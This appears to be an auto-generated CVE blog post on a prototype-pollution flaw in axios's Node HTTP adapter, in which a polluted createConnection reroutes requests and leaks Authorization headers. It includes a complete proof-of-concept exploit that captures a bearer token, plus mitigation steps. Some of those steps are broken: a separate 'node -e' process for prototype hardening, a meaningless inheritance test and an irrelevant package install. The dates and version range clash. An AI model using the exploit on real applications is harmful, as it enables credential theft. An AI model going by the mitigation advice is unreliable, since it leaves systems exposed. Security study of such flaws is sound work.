Nodejs HTTP Adapter, Prototype Pollution Gadget, CVE-2026-101905 (High) -DC-Sep2026-2670

Listen to this Post

Axios is a promise-based HTTP client for the browser and Node.js. From version 1.15.2 until 1.20.0, the Node HTTP adapter in lib/adapters/http.js supplies request options without an own createConnection value. A separate same-process prototype-pollution flaw places a function on Object.prototype.createConnection. Node resolves and invokes the inherited createConnection socket factory, allowing the attacker-controlled function to select the transport endpoint. The attacker endpoint can receive request headers and bodies, including credentials, and return attacker-controlled responses while the URL appears legitimate. This issue is fixed in version 1.20.0.
The adapter creates a null-prototype options object before calling the selected transport:

const options = Object.assign(Object.create(null), {

path,

method: method,

headers: toByteStringHeaderObject(headers),

agents: { http: config.httpAgent, https: config.httpsAgent },

auth,

protocol,

family,

beforeRedirect: dispatchBeforeRedirect,

beforeRedirects: Object.create(null),

http2Options,

});

That prevents direct inherited reads while the options object remains null-prototype. However, Node’s HTTP client path copies or normalizes request options into ordinary objects before connection creation. After that copy, missing properties can resolve from Object.prototype again. createConnection is a sensitive Node HTTP option. If it is inherited after this copy, Node calls the attacker-supplied function to create the socket. The request never reaches the intended target. The attacker-controlled server receives the Authorization header and supplies the response body returned by axios. Given a prior same-process prototype-pollution primitive, an attacker can redirect later axios Node HTTP requests at the socket layer while the request URL and axios config still appear to target the legitimate origin. This can bypass application destination validation that checks the URL before calling axios, because the URL remains legitimate while the underlying socket goes elsewhere. Axios does not create the prototype pollution source. The vulnerability is that axios does not set an own safe value for a sensitive transport option before handing options to Node.

DailyCVE Form:

Platform: Node.js HTTP adapter
Version: 1.15.2 to 1.20.0
Vulnerability: Prototype pollution socket hijack
Severity: High (CVSS 7.6)
date: 2026-09-30

Prediction: 2026-08-19

What Undercode Say: Analytics

Check installed axios version
npm list axios
Test if createConnection is inherited
node -e "Object.prototype.createConnection = function(){}; const axios = require('axios'); console.log(Object.prototype.hasOwnProperty.call(axios.defaults, 'createConnection'))"
Monitor network traffic during axios request
strace -e trace=network -f node app.js
// Vulnerable adapter options object (no own createConnection)
const options = Object.assign(Object.create(null), {
path, method, headers, agents, auth, protocol, family,
beforeRedirect, beforeRedirects, http2Options
});
// Fixed adapter options object
const options = Object.assign(Object.create(null), {
path, method, headers, agents, auth, protocol, family,
beforeRedirect, beforeRedirects, http2Options,
createConnection: undefined // own safe value
});
Reproduction: pollute prototype and observe socket hijack
node --experimental-modules poc.mjs
Expected output (vulnerable):
{ response: 'ATTACKER', legitHits: [], attackerHits: [{ url: '/secret', auth: 'Bearer SECRET' }] }

Exploit: (Educational Purposes!)

import net from 'node:net';
import http from 'node:http';
import axios from 'axios';
function listen(handler) {
return new Promise(resolve => {
const s = http.createServer(handler);
s.listen(0, '127.0.0.1', () => resolve(s));
});
}
const legitHits = [];
const attackerHits = [];
const legit = await listen((req, res) => {
legitHits.push({url: req.url, auth: req.headers.authorization || null});
res.end('LEGIT');
});
const attacker = await listen((req, res) => {
attackerHits.push({url: req.url, auth: req.headers.authorization || null});
res.end('ATTACKER');
});
Object.prototype.createConnection = function(options, cb) {
const sock = net.createConnection({
host: '127.0.0.1',
port: attacker.address().port,
}, () => {
if (typeof cb === 'function') cb(null, sock);
});
return sock;
};
const res = await axios.get(`http://127.0.0.1:${legit.address().port}/secret`, {
headers: {Authorization: 'Bearer SECRET'},
proxy: false,
});
console.log({
response: res.data,
legitHits,
attackerHits,
});

Protection: from this CVE

Upgrade to axios 1.20.0 or later
npm install [email protected]
Verify no prototype pollution in dependencies
npm audit
Use custom trusted transport
npm install https-proxy-agent
// Custom trusted transport with enforced connection
import https from 'node:https';
const agent = new https.Agent({
createConnection: (options, cb) => {
// Enforce own connection logic
return https.globalAgent.createConnection(options, cb);
}
});
await axios.get(url, { httpsAgent: agent });
Set own safe defaults for sensitive options
In application startup:
node -e "Object.defineProperty(Object.prototype, 'createConnection', { value: undefined, writable: false, configurable: false })"

Impact:

An attacker with a prior same-process prototype-pollution primitive can redirect later axios Node HTTP requests at the socket layer while the request URL and axios config still appear to target the legitimate origin. The attacker-controlled endpoint can receive request headers and bodies, including Authorization headers, cookies, API keys, and service credentials, and can return attacker-controlled responses to the application. This can bypass application destination validation that checks the URL before calling axios, because the URL remains legitimate while the underlying socket goes elsewhere. The important boundary is axios’ documented read-side prototype-pollution hardening. The project threat model discusses polluted Object.prototype from transitive dependencies as an in-scope read-side gadget class where axios should avoid picking up inherited behavior-changing properties. This issue is a bypass of that hardening at the Node HTTP request-options boundary. Affected functionality includes Node.js HTTP adapter, HTTP and HTTPS request paths that rely on Node/follow-redirects option processing and do not set an own safe createConnection, and processes where Object.prototype.createConnection is polluted. Not affected: browser adapters, processes without prototype pollution, and requests using a custom trusted transport that ignores inherited createConnection and sanitizes options internally.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top